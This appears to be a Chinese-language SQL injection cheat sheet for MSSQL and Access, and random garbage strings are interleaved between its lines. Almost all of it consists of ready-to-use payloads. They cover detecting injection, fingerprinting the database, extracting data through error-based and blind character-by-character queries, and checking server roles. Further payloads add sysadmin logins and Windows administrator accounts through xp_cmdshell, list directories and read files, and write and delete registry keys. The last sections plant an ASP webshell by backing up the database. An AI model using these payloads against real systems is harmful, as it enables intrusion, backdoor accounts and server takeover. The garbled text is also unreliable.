1.判断是否有注入 ;and 1=1 ;and 1=2 （两者页面返回不同即可能存在注入；布尔判断本身不需要前导分号，分号只在后面的堆叠查询 ;exec 中才有意义）
2.初步判断是否是mssql ;and user>0 （mssql 中 user 为 nvarchar，与整数比较会报类型转换错误，并在错误信息中泄露当前用户名；需要服务器回显错误才有效）
#0c;2}D
3.注入参数是字符型 'and [查询条件] and ''=' （用 ''=' 闭合原语句末尾的单引号）
zd3^k<
4.搜索参数（like '%...%'）未过滤时 'and [查询条件] and '%25'=' （%25 为 URL 编码的 %，用于闭合 like 的通配符和引号）
m{by%
5.判断数据库系统
ycrM8Mu
3
;and (select count(*) from sysobjects)>0 mssql （sysobjects 是 mssql 的系统表）
HxNoV.q
;and (select count(*) from msysobjects)>0 access （Access 通常对 MSysObjects 没有读权限，返回权限错误同样可作为判断依据）
R T/)<RT9
]%+T+zg(Y
beFD}`
6.猜表名 ;and (select Count(*) from [表名])>0 （条件为真说明该表存在；这里猜的是表名而非数据库名）
b5W(}ka+
7.猜字段 ;and (select Count(字段名) from 表名)>0
} ^WmCX2a
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 表名)>N （把 N 换成猜测的长度，用 > 和 < 二分逼近）
{Z#=ppvs
9.(1)猜字段的ascii值(access)
c>BDw<
;and (select top 1 asc(mid(字段名,1,1)) from 表名)>N （N 为猜测的 ASCII 值，逐位二分；猜第二位时改为 mid(字段名,2,1)）
Q:j)F|uhc
(2)猜字段的ascii值(mssql)
t>eeOWk3
;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>N （N 为猜测的 Unicode 码值，逐位二分；没有 order by 时 top 1 取到的行不保证固定）
7Jn%c<s
10.测试权限结构(mssql) （以下语句返回真即表示当前登录属于该服务器角色）
5RR4jX]
ageTv/
a&<_M$J&
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
jAfqC@e
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
B:(a?X-7
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
F87c?Vh)K
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
Rl n% Y
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
cnj32H^+
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
K$5mDScoJ
;and 1=(select IS_MEMBER('db_owner'));-- （IS_MEMBER 检查的是当前数据库的角色，而不是服务器角色）
[!U!
Z'i
N_?15R7h
fzzk#jU
11.添加mssql和系统的帐户 （需要 sysadmin 权限；xp_cmdshell 在 SQL Server 2005 及以后默认关闭，需先通过 sp_configure 启用）
h/..cVD,K
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,password,username;-- （sp_password 的参数顺序为 旧密码,新密码,登录名，原文把新密码和登录名写反了）
n= FOB0=
;exec master.dbo.sp_addsrvrolemember username,sysadmin;-- （参数顺序为 登录名,角色名，且两个参数之间要用逗号分隔）
JKc
a$$aM2.2
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';-- （这是一条完整命令，原文被拆成两行，且 * 与 /times 之间缺少空格）
t_id/
;exec master.dbo.xp_cmdshell 'net user username password /add';--
n,`j~.l-=>
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
_xr@dK<
U$LI~XZM
9}'92
12.(1)遍历目录 （xp_dirtree 返回 subdirectory 和 depth 两列，与下面 dirs 表的两列一一对应）
]BfJ~+ N
;create table dirs(paths varchar(100), id int)
|J:m{
;insert dirs exec master.dbo.xp_dirtree 'c:\'
BF /4
;and (select top 1 paths from dirs)>0 （利用 varchar 与 int 比较的转换错误回显目录名）
{}"a_L&[;
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>0 （原文结尾的 >) 是笔误，应为 >0；每次把已得到的目录名追加进 not in 列表即可逐个回显）
ow*^z78M{
Qb' Q4@.
CQH^VTQ
(2)遍历目录
C#P7@ JE
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器（该过程返回四列，与 temp 表的四列对应）
yv\
j&B|
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
%XH%.Ps/
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构
!V,++j
9(hI%idq
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容
i&0Zli
O&r9+r1`
Ted!*HKlB
13.mssql中的存储过程 （以下注册表相关的扩展存储过程同样需要 sysadmin 权限）
#2;8/"v
xp_regenumvalues 注册表根键, 子键
W$:D#;jz`h
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值
]*<!|;q
xp_regread 根键,子键,键值名
%FLe@.Ep{D
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回指定键的值
!Z~j T
Pa"[&{ :
xp_regwrite 根键,子键, 值名, 值类型, 值
'25zb+-
常用的值类型有2种：REG_SZ 表示字符串，REG_DWORD 表示整型
';I(#J6
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表
'W/AYF^5
xp_regdeletevalue 根键,子键,值名
R_b)2FU1y
;exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值
tD> qHR
;exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值
U,Th-oU
lQG;WVqW
2tZ\/6G<
14.mssql的backup创建webshell （需要备份权限，且 SQL Server 服务账户对目标路径有写权限；生成的文件会夹带备份头等二进制内容，依赖 ASP 只解析 <% %> 内的脚本）
X@I8+v
r=<1*u
use model
PKYm{wO-
create table cmd(str image);
Z._%T$8aJv
insert into cmd(str) values ('');  -- 引号内应填入要写入文件的 ASP 脚本内容，此处为空
Wo6C0Z3g}
backup database model to disk='c:\l.asp';  -- 路径是 SQL Server 所在机器上的本地路径，需指向可被 Web 访问的目录
h&z(;B!;y.
&"clBRVg
j4$NQ]e^4
15.mssql内置函数 （以下均依赖字符串与整数比较时的转换错误回显）
A#nSK#wS61
;and (select @@version)>0 获得 SQL Server 的版本信息（其中也包含操作系统版本）
|?
8^hbS%s!
;and user_name()='dbo' 判断当前连接用户是否映射为数据库所有者 dbo（dbo 不等于 sa；是否具有 sa 权限应以第10节的 IS_SRVROLEMEMBER('sysadmin') 为准）
>g2Z t;*@w
;and (select user_name())>0 爆当前系统的连接用户
oPrK{flm
;and (select db_name())>0 得到当前连接的数据库
IQ5'4zQg=
r_pZK(G%
O]G3 l0
16.简洁的webshell （与第14节相同，只是备份目标路径不同）
F,@uYMQs
use model
OK%d1M^8j
create table cmd(str image);
e]D TK*W~
insert into cmd(str) values ('');  -- 引号内应填入要写入文件的 ASP 脚本内容，此处为空
TCK<IZKLqK
backup database model to disk='g:\wwwtest\l.asp';